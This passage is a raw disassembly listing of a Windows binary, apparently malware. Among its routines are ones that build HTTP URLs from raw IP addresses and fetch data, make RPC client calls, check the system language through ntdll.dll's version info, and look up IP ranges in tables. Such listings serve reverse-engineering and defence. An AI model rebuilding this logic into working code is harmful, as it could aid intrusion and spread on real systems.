loc_9AECC0: ; CODE XREF: sub_9AECA4+15�j
push esi
push offset dword_9BA298
push eax
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+szUrl]
push 80h ; Count
push eax ; Dest
call _snprintf
push edi ; int
lea eax, [ebp+arg_4]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
call sub_9ABAC6
mov esi, eax
add esp, 30h
cmp esi, edi
jz short loc_9AED32
mov eax, ds:nNumberOfBytesToWrite
cmp [ebp+arg_4], eax
jb short loc_9AED2B
push eax ; Size
push ds:lpBuffer ; Buf2
push esi ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9AED2B
xor edi, edi
inc edi
loc_9AED2B: ; CODE XREF: sub_9AECA4+6E�j
; sub_9AECA4+82�j
push esi ; hMem
call GlobalFree
loc_9AED32: ; CODE XREF: sub_9AECA4+64�j
pop esi
loc_9AED33: ; CODE XREF: sub_9AECA4+1A�j
mov eax, edi
pop edi
leave
retn
sub_9AECA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AED38 proc near ; CODE XREF: sub_9A983B+82�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+arg_0]
push eax
push offset pFormat ; pFormat
push offset pStubDescriptor ; pStubDescriptor
call NdrClientCall2
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_9AED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AED5A proc near ; CODE XREF: sub_9A97A7+5A�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+arg_0]
push eax
push offset byte_9A52DC ; pFormat
push offset pStubDescriptor ; pStubDescriptor
call NdrClientCall2
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_9AED5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AED7C proc near ; CODE XREF: sub_9AEFDD+1E�p
tstrFilename = byte ptr -134h
var_133 = byte ptr -133h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
dwHandle = dword ptr -28h
lpBuffer = dword ptr -24h
puLen = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 124h
push offset stru_9A6A40
call __SEH_prolog
mov [ebp+var_1C], 9
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+tstrFilename], bl
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_133]
rep stosd
stosw
stosb
push 104h ; nSize
lea eax, [ebp+tstrFilename]
push eax ; lpFilename
push offset aNtdll_dll ; "ntdll.dll"
call GetModuleHandleA
push eax ; hModule
call GetModuleFileNameA
lea eax, [ebp+dwHandle]
push eax ; lpdwHandle
lea eax, [ebp+tstrFilename]
push eax ; lptstrFilename
call GetFileVersionInfoSizeA
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz short loc_9AEE52
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, ebx
jz short loc_9AEE52
push edi ; lpData
push esi ; dwLen
push ebx ; dwHandle
lea eax, [ebp+tstrFilename]
push eax ; lptstrFilename
call GetFileVersionInfoA
test eax, eax
jz short loc_9AEE42
lea eax, [ebp+puLen]
push eax ; puLen
lea eax, [ebp+lpBuffer]
push eax ; lplpBuffer
push offset SubBlock ; "\\VarFileInfo\\Translation"
push edi ; pBlock
call VerQueryValueA
test eax, eax
jz short loc_9AEE42
cmp [ebp+puLen], ebx
jz short loc_9AEE42
mov eax, [ebp+lpBuffer]
movzx eax, word ptr [eax]
mov [ebp+var_1C], eax
cmp ax, 804h
jz short loc_9AEE42
cmp ax, 416h
jz short loc_9AEE42
and eax, 0FFFF03FFh
mov [ebp+var_1C], eax
loc_9AEE42: ; CODE XREF: sub_9AED7C+8B�j
; sub_9AED7C+A2�j ...
push edi ; hMem
call GlobalFree
jmp short loc_9AEE52
; ---------------------------------------------------------------------------
loc_9AEE4B: ; DATA XREF: .text:stru_9A6A40�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AEE4F: ; DATA XREF: .text:stru_9A6A40�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AEE52: ; CODE XREF: sub_9AED7C+66�j
; sub_9AED7C+78�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ax, word ptr [ebp+var_1C]
call __SEH_epilog
retn
sub_9AED7C endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AEE60(const void *, const void *)
sub_9AEE60 proc near ; DATA XREF: sub_9AEEBC+80�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax]
cmp [esp+arg_0], ecx
jb short loc_9AEE7B
movzx eax, byte ptr [eax+4]
add eax, ecx
cmp eax, [esp+arg_0]
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_9AEE7B: ; CODE XREF: sub_9AEE60+A�j
or eax, 0FFFFFFFFh
retn
sub_9AEE60 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AEE7F(const void *, const void *)
sub_9AEE7F proc near ; DATA XREF: sub_9AEEBC+55�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax]
cmp [esp+arg_0], ecx
jb short loc_9AEE9A
movzx eax, word ptr [eax+4]
add eax, ecx
cmp eax, [esp+arg_0]
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_9AEE9A: ; CODE XREF: sub_9AEE7F+A�j
or eax, 0FFFFFFFFh
retn
sub_9AEE7F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl PtFuncCompare(const void *, const void *)
PtFuncCompare proc near ; DATA XREF: sub_9AEEBC+2A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax]
cmp [esp+arg_0], ecx
jb short loc_9AEEB8
mov eax, [eax+4]
add eax, ecx
cmp eax, [esp+arg_0]
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_9AEEB8: ; CODE XREF: PtFuncCompare+A�j
or eax, 0FFFFFFFFh
retn
PtFuncCompare endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AEEBC(u_long netlong)
sub_9AEEBC proc near ; CODE XREF: sub_9AEF58+27�p
netlong = dword ptr 4
push ebx
push esi
push edi
push [esp+0Ch+netlong] ; netlong
or bl, 0FFh
call ntohl_0
mov esi, bsearch
mov edi, eax
mov eax, ds:Base
test eax, eax
jz short loc_9AEEFE
mov ecx, ds:NumOfElements
test ecx, ecx
jz short loc_9AEEFE
push offset PtFuncCompare ; PtFuncCompare
push 9 ; SizeOfElements
push ecx ; NumOfElements
push eax ; Base
push edi ; Key
call esi ; bsearch
add esp, 14h
test eax, eax
jz short loc_9AEEFE
mov bl, [eax+8]
jmp short loc_9AEF52
; ---------------------------------------------------------------------------
loc_9AEEFE: ; CODE XREF: sub_9AEEBC+1E�j
; sub_9AEEBC+28�j ...
mov ecx, ds:dword_9BA2C0
test ecx, ecx
jz short loc_9AEF29
mov eax, ds:dword_9BA2C4
test eax, eax
jz short loc_9AEF29
push offset sub_9AEE7F ; PtFuncCompare
push 7 ; SizeOfElements
push eax ; NumOfElements
push ecx ; Base
push edi ; Key
call esi ; bsearch
add esp, 14h
test eax, eax
jz short loc_9AEF29
mov bl, [eax+6]
jmp short loc_9AEF52
; ---------------------------------------------------------------------------
loc_9AEF29: ; CODE XREF: sub_9AEEBC+4A�j
; sub_9AEEBC+53�j ...
mov ecx, ds:dword_9BA2B0
test ecx, ecx
jz short loc_9AEF52
mov eax, ds:dword_9BA2AC
test eax, eax
jz short loc_9AEF52
push offset sub_9AEE60 ; PtFuncCompare
push 6 ; SizeOfElements
push eax ; NumOfElements
push ecx ; Base
push edi ; Key
call esi ; bsearch
add esp, 14h
test eax, eax
jz short loc_9AEF52
mov bl, [eax+5]
loc_9AEF52: ; CODE XREF: sub_9AEEBC+40�j
; sub_9AEEBC+6B�j ...
pop edi
pop esi
mov al, bl
pop ebx
retn
sub_9AEEBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AEF58(u_long netlong)
sub_9AEF58 proc near ; CODE XREF: sub_9A9BBC+57�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
ms_exc = CPPEH_RECORD ptr -18h
netlong = dword ptr 8
push 14h
push offset stru_9A6A50
call __SEH_prolog
mov [ebp+var_24], 9
and [ebp+ms_exc.disabled], 0
push [ebp+netlong]
call sub_9AB389
pop ecx
test eax, eax
jz short loc_9AEFBE
push [ebp+netlong] ; netlong
call sub_9AEEBC
pop ecx
mov [ebp+var_19], al
cmp al, 0FFh
jz short loc_9AEFCF
and [ebp+var_20], 0
loc_9AEF90: ; CODE XREF: sub_9AEF58+64�j
cmp [ebp+var_20], 17h
jnb short loc_9AEFCF
mov ecx, [ebp+var_20]
shl ecx, 2
cmp al, ds:byte_9A69C8[ecx]
jb short loc_9AEFB9
cmp al, ds:byte_9A69C9[ecx]
ja short loc_9AEFB9
mov ax, ds:word_9A69CA[ecx]
mov word ptr [ebp+var_24], ax
jmp short loc_9AEFCF
; ---------------------------------------------------------------------------
loc_9AEFB9: ; CODE XREF: sub_9AEF58+4A�j
; sub_9AEF58+52�j
inc [ebp+var_20]
jmp short loc_9AEF90
; ---------------------------------------------------------------------------
loc_9AEFBE: ; CODE XREF: sub_9AEF58+22�j
mov eax, ds:dword_9BA2B4
mov [ebp+var_24], eax
jmp short loc_9AEFCF
; ---------------------------------------------------------------------------
loc_9AEFC8: ; DATA XREF: .text:stru_9A6A50�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AEFCC: ; DATA XREF: .text:stru_9A6A50�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AEFCF: ; CODE XREF: sub_9AEF58+32�j
; sub_9AEF58+3C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ax, word ptr [ebp+var_24]
call __SEH_epilog
retn
sub_9AEF58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AEFDD proc near ; CODE XREF: StartAddress+1CD�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_9A6A80
call __SEH_prolog
xor esi, esi
cmp word ptr ds:dword_9BA2B4, si
jnz loc_9AF0B6
mov [ebp+ms_exc.disabled], esi
call sub_9AED7C
mov word ptr ds:dword_9BA2B4, ax
cmp [ebp+arg_0], esi
jz loc_9AF0B2
mov ebx, [ebp+arg_4]
cmp ebx, esi
jz loc_9AF0B2
mov [ebp+var_1C], ebx
push 1Eh
mov edi, offset dword_9A6A5C
push edi
push ebx
push [ebp+arg_0]
call sub_9AE06F
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_9AF0BC
mov esi, eax
mov [ebp+var_20], esi
push 1Eh
push edi
push ebx
push [ebp+arg_0]
call sub_9AE06F
add esp, 28h
test esi, esi
jz short loc_9AF0B2
cmp [ebp+var_1C], 0
jz short loc_9AF0B2
lea eax, [esi+4]
mov ds:dword_9BA2B0, eax
mov ecx, [esi]
mov eax, ecx
xor edx, edx
push 6
pop edi
div edi
mov ds:dword_9BA2AC, eax
lea eax, [ecx+esi+8]
mov ds:dword_9BA2C0, eax
mov eax, [ecx+esi+4]
xor edx, edx
push 7
pop edi
div edi
mov ds:dword_9BA2C4, eax
mov eax, [ecx+esi+4]
add eax, ecx
add eax, esi
lea ecx, [eax+0Ch]
mov ds:Base, ecx
mov eax, [eax+8]
xor edx, edx
push 9
pop ecx
div ecx
mov ds:NumOfElements, eax
jmp short loc_9AF0B2
; ---------------------------------------------------------------------------
loc_9AF0AB: ; DATA XREF: .text:stru_9A6A80�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AF0AF: ; DATA XREF: .text:stru_9A6A80�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AF0B2: ; CODE XREF: sub_9AEFDD+2C�j
; sub_9AEFDD+37�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9AF0B6: ; CODE XREF: sub_9AEFDD+15�j
call __SEH_epilog
retn
sub_9AEFDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF0BC proc near ; CODE XREF: sub_9AEFDD+58�p
Memory = dword ptr -450h
var_44C = byte ptr -44Ch
var_430 = dword ptr -430h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 440h
push offset stru_9A6A90
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
mov esi, [ebp+arg_4]
push dword ptr [esi] ; Size
push ebx ; char
push [ebp+arg_0] ; int
call sub_9B3EA2
add esp, 0Ch
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz loc_9AF18D
mov [ebp+Memory], ebx
mov ecx, 108h
xor eax, eax
lea edi, [ebp+var_44C]
rep stosd
lea eax, [ebp+Memory]
push eax ; Memory
push [ebp+var_24] ; int
call sub_9B0DF4
pop ecx
pop ecx
test eax, eax
jnz short loc_9AF177
or [ebp+var_430], 0FFFFFFFFh
lea eax, [ebp+Memory]
push eax
call sub_9B0F21
pop ecx
test eax, eax
jnz short loc_9AF177
mov [ebp+var_1C], ebx
push ebx
lea eax, [ebp+Memory]
push eax
call sub_9B0FE1
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
call sub_9B3D11
add esp, 0Ch
mov [ebp+var_2C], eax
cmp [ebp+var_28], ebx
jnz short loc_9AF16B
cmp eax, ebx
jz short loc_9AF177
mov ecx, [ebp+var_1C]
cmp ecx, ebx
jz short loc_9AF16B
mov [ebp+var_20], eax
mov [esi], ecx
jmp short loc_9AF177
; ---------------------------------------------------------------------------
loc_9AF16B: ; CODE XREF: sub_9AF0BC+9B�j
; sub_9AF0BC+A6�j
cmp eax, ebx
jz short loc_9AF177
push eax ; Memory
call free
pop ecx
loc_9AF177: ; CODE XREF: sub_9AF0BC+5C�j
; sub_9AF0BC+74�j ...
lea eax, [ebp+Memory]
push eax
call sub_9B1166
pop ecx
jmp short loc_9AF18D
; ---------------------------------------------------------------------------
loc_9AF186: ; DATA XREF: .text:stru_9A6A90�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AF18A: ; DATA XREF: .text:stru_9A6A90�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AF18D: ; CODE XREF: sub_9AF0BC+2E�j
; sub_9AF0BC+C8�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9AF0BC endp
; =============== S U B R O U T I N E =======================================
sub_9AF19A proc near ; CODE XREF: sub_9B030E+70D�p
; sub_9B030E+84F�p
arg_0 = dword ptr 4
lea ecx, [eax+408AFCh]
mov edx, [ecx]
mov [eax+408B00h], edx
lea edx, [eax+408AF8h]
push esi
mov esi, [edx]
mov [ecx], esi
add eax, 408AF4h
mov ecx, [eax]
mov [edx], ecx
mov ecx, [esp+4+arg_0]
mov [eax], ecx
pop esi
retn
sub_9AF19A endp
; =============== S U B R O U T I N E =======================================
sub_9AF1C4 proc near ; CODE XREF: sub_9B030E+59B�p
; sub_9B030E+866�p
arg_0 = dword ptr 4
push esi
mov esi, [eax+40800Ch]
push edi
mov edi, ecx
mov ecx, esi
sub ecx, [esp+8+arg_0]
mov edx, 3FFEFCh
cmp ecx, edx
jnb short loc_9AF221
cmp esi, edx
jnb short loc_9AF221
mov dl, [ecx+eax+8004h]
mov [esi+eax+8004h], dl
inc dword ptr [eax+40800Ch]
mov edx, [eax+40800Ch]
inc ecx
dec edi
jz short loc_9AF257
lea esi, [ecx+eax+8004h]
loc_9AF206: ; CODE XREF: sub_9AF1C4+59�j
mov cl, [esi]
mov [edx+eax+8004h], cl
inc dword ptr [eax+40800Ch]
mov edx, [eax+40800Ch]
inc esi
dec edi
jnz short loc_9AF206
jmp short loc_9AF257
; ---------------------------------------------------------------------------
loc_9AF221: ; CODE XREF: sub_9AF1C4+17�j
; sub_9AF1C4+1B�j
test edi, edi
jz short loc_9AF257
mov esi, 3FFFFFh
push ebx
loc_9AF22B: ; CODE XREF: sub_9AF1C4+90�j
mov ebx, [eax+40800Ch]
mov edx, ecx
and edx, esi
mov dl, [edx+eax+8004h]
mov [eax+ebx+8004h], dl
mov edx, [eax+40800Ch]
inc ecx
inc edx
and edx, esi
dec edi
mov [eax+40800Ch], edx
jnz short loc_9AF22B
pop ebx
loc_9AF257: ; CODE XREF: sub_9AF1C4+39�j
; sub_9AF1C4+5B�j ...
pop edi
pop esi
retn
sub_9AF1C4 endp
; =============== S U B R O U T I N E =======================================
sub_9AF25A proc near ; CODE XREF: sub_9AF7C6+89�p
; sub_9AF875+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
lea edx, [ecx+408008h]
add eax, [edx]
push esi
mov esi, eax
sar esi, 3
add [ecx+408004h], esi
and eax, 7
mov [edx], eax
pop esi
retn
sub_9AF25A endp
; =============== S U B R O U T I N E =======================================
sub_9AF27D proc near ; CODE XREF: sub_9AF7C6+7�p
; sub_9AF875+43�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov eax, [edx+408004h]
push ebx
xor ebx, ebx
add eax, edx
mov bh, [eax+4]
push 8
pop ecx
sub ecx, [edx+408008h]
mov bl, [eax+5]
movzx eax, byte ptr [eax+6]
shl ebx, 8
or ebx, eax
shr ebx, cl
and ebx, 0FFFFh
mov eax, ebx
pop ebx
retn
sub_9AF27D endp
; =============== S U B R O U T I N E =======================================
sub_9AF2B0 proc near ; CODE XREF: sub_9AF380+16�p
; sub_9AF875+21�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
mov ecx, [esi+408018h]
mov eax, [esi+408004h]
push edi
mov edi, ecx
sub edi, eax
jns short loc_9AF2CF
xor eax, eax
jmp loc_9AF37D
; ---------------------------------------------------------------------------
loc_9AF2CF: ; CODE XREF: sub_9AF2B0+16�j
cmp eax, 4000h
jle short loc_9AF2FC
test edi, edi
jle short loc_9AF2ED
lea eax, [eax+esi+4]
push edi ; Size
push eax ; Src
lea eax, [esi+4]
push eax ; Dst
call memmove
add esp, 0Ch
loc_9AF2ED: ; CODE XREF: sub_9AF2B0+28�j
and dword ptr [esi+408004h], 0
mov [esi+408018h], edi
jmp short loc_9AF2FE
; ---------------------------------------------------------------------------
loc_9AF2FC: ; CODE XREF: sub_9AF2B0+24�j
mov edi, ecx
loc_9AF2FE: ; CODE XREF: sub_9AF2B0+4A�j
mov ecx, [esi+40D7F8h]
push ebx
mov ebx, 8000h
mov eax, ebx
sub eax, edi
and eax, 0FFFFFFF0h
cmp ecx, eax
jnb short loc_9AF317
mov eax, ecx
loc_9AF317: ; CODE XREF: sub_9AF2B0+63�j
push eax ; Size
lea eax, [edi+esi+4]
push eax ; Dst
push [esp+14h+arg_0] ; int
call sub_9B3D6A
mov edi, eax
add esp, 0Ch
test edi, edi
jle short loc_9AF33B
add [esi+408018h], edi
sub [esi+40D7F8h], edi
loc_9AF33B: ; CODE XREF: sub_9AF2B0+7D�j
mov eax, [esi+408018h]
lea ecx, [eax-1Eh]
cmp ecx, [esi+408004h]
mov [esi+40801Ch], ecx
jge short loc_9AF374
lea ecx, [eax+1Eh]
cmp ecx, ebx
jge short loc_9AF35E
push 1Eh
pop ecx
jmp short loc_9AF364
; ---------------------------------------------------------------------------
loc_9AF35E: ; CODE XREF: sub_9AF2B0+A7�j
mov ecx, ebx
sub ecx, eax
jz short loc_9AF374
loc_9AF364: ; CODE XREF: sub_9AF2B0+AC�j
push ecx ; Size
lea eax, [eax+esi+4]
push 0 ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9AF374: ; CODE XREF: sub_9AF2B0+A0�j
; sub_9AF2B0+B2�j
xor eax, eax
cmp edi, 0FFFFFFFFh
setnz al
pop ebx
loc_9AF37D: ; CODE XREF: sub_9AF2B0+1A�j
pop edi
pop esi
retn
sub_9AF2B0 endp
; =============== S U B R O U T I N E =======================================
sub_9AF380 proc near ; CODE XREF: sub_9B24CC+E�p
; sub_9B24CC+2F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
cmp dword ptr [esi+408004h], 7FE2h
jle short loc_9AF3A6
push esi
push [esp+8+arg_0]
call sub_9AF2B0
test eax, eax
pop ecx
pop ecx
jnz short loc_9AF3A6
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AF3A6: ; CODE XREF: sub_9AF380+F�j
; sub_9AF380+1F�j
mov eax, [esi+408004h]
mov cl, [eax+esi+4]
inc eax
mov [esi+408004h], eax
movzx eax, cl
pop esi
retn
sub_9AF380 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AF3BC(void *Src, size_t Size)
sub_9AF3BC proc near ; CODE XREF: sub_9AF3FD+1C�p
; sub_9AF3FD+2B�p ...
Src = dword ptr 4
Size = dword ptr 8
push esi
push [esp+4+Size] ; Size
mov esi, eax
push [esp+8+Src] ; Src
push dword ptr [esi] ; int
call sub_9B3DC6
add esp, 0Ch
test eax, eax
jle short loc_9AF3E1
cdq
lea ecx, [esi+40D7BCh]
add [ecx], eax
adc [ecx+4], edx
loc_9AF3E1: ; CODE XREF: sub_9AF3BC+17�j
push [esp+4+Size]
add esi, 40D7F4h
push [esp+8+Src]
push dword ptr [esi]
call sub_9B27A7
add esp, 0Ch
mov [esi], eax
pop esi
retn
sub_9AF3BC endp
; =============== S U B R O U T I N E =======================================
; int __fastcall sub_9AF3FD(size_t Size)
sub_9AF3FD proc near ; CODE XREF: sub_9AF4A5+7C�p
; sub_9AF4A5+20A�p
push edi
mov edi, ecx
cmp edi, eax
jnb short loc_9AF432
mov ecx, eax
neg ecx
and ecx, 3FFFFFh
lea eax, [esi+eax+8004h]
push ecx ; Size
push eax ; Src
mov eax, esi
call sub_9AF3BC
lea eax, [esi+8004h]
push edi ; Size
push eax ; Src
mov eax, esi
call sub_9AF3BC
add esp, 10h
pop edi
retn
; ---------------------------------------------------------------------------
loc_9AF432: ; CODE XREF: sub_9AF3FD+5�j
sub edi, eax
lea eax, [esi+eax+8004h]
push edi ; Size
push eax ; Src
mov eax, esi
call sub_9AF3BC
pop ecx
pop ecx
pop edi
retn
sub_9AF3FD endp
; =============== S U B R O U T I N E =======================================
sub_9AF448 proc near ; CODE XREF: sub_9AF4A5+113�p
; sub_9AF4A5+18E�p
cmp dword ptr [edi+18h], 0
push esi
mov esi, eax
jle short loc_9AF4A3
mov eax, [esi+40D7BCh]
mov [edi+3Ch], eax
push dword ptr [esi+40D7BCh]
mov eax, [edi+0Ch]
add eax, 24h
push eax
push 0
call sub_9B278D
mov eax, [esi+40D7BCh]
mov edx, [esi+40D7C0h]
add esp, 0Ch
mov cl, 20h
call __allshr
push eax
mov eax, [edi+0Ch]
add eax, 28h
push eax
push 0
call sub_9B278D
push edi ; Size
add esi, 40D7CCh
push esi ; int
call sub_9B3713
add esp, 14h
loc_9AF4A3: ; CODE XREF: sub_9AF448+7�j
pop esi
retn
sub_9AF448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF4A5 proc near ; CODE XREF: sub_9B030E+4AE�p
; sub_9B030E+733�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Src = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
and [ebp+var_4], 0
push ebx
push esi
mov esi, eax
mov eax, [esi+408010h]
mov ecx, [esi+40800Ch]
sub ecx, eax
and ecx, 3FFFFFh
cmp dword ptr [esi+40D7ACh], 0
push edi
jbe loc_9AF6A9
loc_9AF4D5: ; CODE XREF: sub_9AF4A5+1FE�j
mov ebx, [ebp+var_4]
mov edx, [esi+40D7A8h]
shl ebx, 2
mov edx, [ebx+edx]
test edx, edx
mov [ebp+var_8], edx
jz loc_9AF697
cmp dword ptr [edx+0Ch], 0
jz short loc_9AF4FE
and dword ptr [edx+0Ch], 0
jmp loc_9AF697
; ---------------------------------------------------------------------------
loc_9AF4FE: ; CODE XREF: sub_9AF4A5+4E�j
mov edi, [edx]
mov edx, [edx+4]
mov [ebp+Src], edx
mov edx, edi
sub edx, eax
and edx, 3FFFFFh
cmp edx, ecx
mov [ebp+var_14], edi
jnb loc_9AF697
cmp eax, edi
jz short loc_9AF539
mov ecx, edi ; Size
call sub_9AF3FD
mov ecx, [esi+40800Ch]
sub ecx, edi
mov edx, 3FFFFFh
mov eax, edi
and ecx, edx
jmp short loc_9AF53E
; ---------------------------------------------------------------------------
loc_9AF539: ; CODE XREF: sub_9AF4A5+78�j
mov edx, 3FFFFFh
loc_9AF53E: ; CODE XREF: sub_9AF4A5+92�j
cmp [ebp+Src], ecx
ja loc_9AF6C5
mov ecx, [ebp+Src]
lea eax, [ecx+edi]
and eax, edx
cmp edi, eax
mov [ebp+var_10], eax
jb short loc_9AF596
test eax, eax
jz short loc_9AF596
mov eax, edx
sub eax, edi
push eax ; int
mov [ebp+Src], eax
lea eax, [esi+edi+8004h]
push eax ; Src
lea ecx, [esi+40D7CCh]
push 0 ; int
push ecx ; int
call sub_9B2A35
push [ebp+var_10] ; int
lea eax, [esi+8004h]
push eax ; Src
push [ebp+Src] ; int
lea eax, [esi+40D7CCh]
push eax ; int
call sub_9B2A35
add esp, 20h
jmp short loc_9AF5B0
; ---------------------------------------------------------------------------
loc_9AF596: ; CODE XREF: sub_9AF4A5+AF�j
; sub_9AF4A5+B3�j
push ecx ; int
lea ecx, [edi+esi+8004h]
push ecx ; Src
lea eax, [esi+40D7CCh]
push 0 ; int
push eax ; int
call sub_9B2A35
add esp, 10h
loc_9AF5B0: ; CODE XREF: sub_9AF4A5+EF�j
mov edi, [ebp+var_8]
add edi, 10h
mov eax, esi
call sub_9AF448
mov eax, [edi+14h]
mov edi, [edi+40h]
mov [ebp+Src], eax
mov eax, [esi+40D7A8h]
push dword ptr [ebx+eax] ; Memory
call sub_9B12A0
mov eax, [esi+40D7A8h]
and dword ptr [ebx+eax], 0
mov eax, [ebp+var_4]
inc eax
cmp eax, [esi+40D7ACh]
pop ecx
jnb loc_9AF679
mov [ebp+var_8], eax
loc_9AF5F2: ; CODE XREF: sub_9AF4A5+1CE�j
mov eax, [esi+40D7A8h]
mov eax, [ebx+eax+4]
test eax, eax
jz short loc_9AF679
mov ecx, [ebp+var_14]
cmp [eax], ecx
jnz short loc_9AF679
cmp [eax+4], edi
jnz short loc_9AF679
cmp dword ptr [eax+0Ch], 0
jnz short loc_9AF679
push edi ; int
push [ebp+Src] ; Src
lea eax, [esi+40D7CCh]
push 0 ; int
push eax ; int
call sub_9B2A35
mov eax, [esi+40D7A8h]
mov edi, [ebx+eax+4]
add edi, 10h
mov eax, esi
call sub_9AF448
mov eax, [edi+14h]
inc [ebp+var_4]
mov edi, [edi+40h]
inc [ebp+var_8]
mov [ebp+Src], eax
mov eax, [ebp+var_4]
mov ebx, eax
mov eax, [esi+40D7A8h]
shl ebx, 2
push dword ptr [ebx+eax] ; Memory
call sub_9B12A0
mov eax, [esi+40D7A8h]
and dword ptr [ebx+eax], 0
mov eax, [ebp+var_8]
add esp, 14h
cmp eax, [esi+40D7ACh]
jb loc_9AF5F2
loc_9AF679: ; CODE XREF: sub_9AF4A5+144�j
; sub_9AF4A5+159�j ...
push edi ; Size
push [ebp+Src] ; Src
mov eax, esi
call sub_9AF3BC
mov eax, [ebp+var_10]
pop ecx
pop ecx
mov ecx, [esi+40800Ch]
sub ecx, eax
and ecx, 3FFFFFh
loc_9AF697: ; CODE XREF: sub_9AF4A5+44�j
; sub_9AF4A5+54�j ...
inc [ebp+var_4]
mov edx, [ebp+var_4]
cmp edx, [esi+40D7ACh]
jb loc_9AF4D5
loc_9AF6A9: ; CODE XREF: sub_9AF4A5+2A�j
mov ecx, [esi+40800Ch] ; Size
call sub_9AF3FD
mov eax, [esi+40800Ch]
loc_9AF6BA: ; CODE XREF: sub_9AF4A5+245�j
pop edi
mov [esi+408010h], eax
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9AF6C5: ; CODE XREF: sub_9AF4A5+9C�j
mov edx, [ebp+var_4]
jmp short loc_9AF6E2
; ---------------------------------------------------------------------------
loc_9AF6CA: ; CODE XREF: sub_9AF4A5+243�j
mov ecx, [esi+40D7A8h]
mov ecx, [ecx+edx*4]
test ecx, ecx
jz short loc_9AF6E1
cmp dword ptr [ecx+0Ch], 0
jz short loc_9AF6E1
and dword ptr [ecx+0Ch], 0
loc_9AF6E1: ; CODE XREF: sub_9AF4A5+230�j
; sub_9AF4A5+236�j
inc edx
loc_9AF6E2: ; CODE XREF: sub_9AF4A5+223�j
cmp edx, [esi+40D7ACh]
